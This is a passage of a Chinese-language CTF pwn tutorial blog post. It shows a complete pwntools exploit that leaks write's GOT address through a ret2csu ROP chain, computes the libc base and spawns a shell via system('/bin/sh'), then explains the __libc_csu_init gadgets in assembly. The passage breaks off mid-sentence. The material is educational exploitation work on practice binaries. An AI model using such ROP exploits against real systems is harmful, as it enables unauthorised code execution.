style=\"color: #A3BE8C\">.\/libc.so.6<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">main <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4011DC<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">&quot;&quot;&quot;<\/span><span style=\"color: #A3BE8C\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">write(fd, buf, count)  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">fd: rdi  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">buf: rsi  <\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#A3BE8C\">count: rdx  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">&quot;&quot;&quot;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_chain <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4012A6<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">mov_reg <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">401290<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4012b3<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40101a<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_chain<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: 
#ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">mov_reg<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Input:<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_real_addr <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span 
style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the real address of write is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_real_addr<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> write_real_addr <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span 
style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">next<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">search<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the address of system is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: 
#ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the address of \/bin\/sh is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: 
#ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">ret<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Input:<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\uff08\u8fd9\u9898\u7ed9\u4e86<code>libc<\/code>\uff0c\u5c31\u4e0d\u7528\u6211\u4eec\u8fd9\u4e48\u8d39\u5fc3\u601d\u53bb\u627e\u4e86\uff09<\/p>\n\n\n\n<p>\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"393\" height=\"396\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-164\"  sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">ret2csu<\/h2>\n\n\n\n<p>\u572864\u4f4d\u7a0b\u5e8f\u4e2d\u5b58\u5728\u4e00\u6bb5\u4e07\u80fd\u7684gadgets\u4ee3\u7801\uff0c\u8fd9\u6bb5\u4ee3\u7801\u53ef\u4ee5\u63a7\u5236<code>rbx<\/code>,<code>rbp<\/code>,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>,<code>r15<\/code>,<code>rdx<\/code>,<code>rsi<\/code>\u53ca<code>edi<\/code>(<code>rdi<\/code>\u7684\u4f4e32\u4f4d)\uff0c\u540c\u65f6\u53ef\u4ee5<code>call<\/code>\u6307\u5b9a\u7684\u5730\u5740\uff0c\u800c\u8fd9\u6bb5\u4ee3\u7801\u5b58\u5728\u4e8e<code>__libc_csu_init<\/code>\uff08\u7528\u4e8e\u52a8\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\u4e2d\u5bf9libc\u7684\u521d\u59cb\u5316\uff09\u8fd9\u4e2a\u51fd\u6570\u4e4b\u4e2d\uff0c\u8fd9\u4e2a\u51fd\u6570\u7684\u6c47\u7f16\u4ee3\u7801\u5982\u4e0b\uff08\u622a\u53d6\u81ea\u67d0\u9053\u9898\u76ee\u7684\u6c47\u7f16\u4ee3\u7801\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"732\" height=\"612\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-165\"  sizes=\"auto, (max-width: 732px) 100vw, 732px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u503c\u5f97\u6211\u4eec\u6ce8\u610f\u7684\u6709\u4e24\u6bb5\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6bb5\uff08\u8bb0\u4e3acsu1\uff09\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre 
class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>mov     rdx, r14\nmov     rsi, r13\nmov     edi, r12d\ncall    ds:(__frame_dummy_init_array_entry - 403E10h)&#91;r15+rbx*8&#93;\nadd     rbx, 1\ncmp     rbp, rbx\njnz     short loc_401290<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rdx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r12d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">ds<\/span><span style=\"color: 
#D8DEE9FF\">:(__frame_dummy_init_array_entry - <\/span><span style=\"color: #B48EAD\">403E10h<\/span><span style=\"color: #D8DEE9FF\">)&#91;<\/span><span style=\"color: #81A1C1\">r15<\/span><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">*<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">cmp<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">jnz<\/span><span style=\"color: #D8DEE9FF\">     short loc_401290<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u524d\u4e09\u884c\u5206\u522b\u8868\u793a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5c06\u5bc4\u5b58\u5668<code>r14<\/code>\u7684\u503c\u8d4b\u7ed9<code>rdx<\/code><\/li>\n\n\n\n<li>\u5c06\u5bc4\u5b58\u5668<code>r13<\/code>\u7684\u503c\u8d4b\u7ed9<code>rsi<\/code><\/li>\n\n\n\n<li>\u5c06\u5bc4\u5b58\u5668<code>r12<\/code>\u7684\u4f4e32\u4f4d\u7684\u503c\u8d4b\u7ed9<code>edi<\/code>\uff08<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff09<\/li>\n<\/ol>\n\n\n\n<p>\u540e\u9762\u4e00\u884c\uff08<code>ds:(__frame_dummy_init_array_entry - 
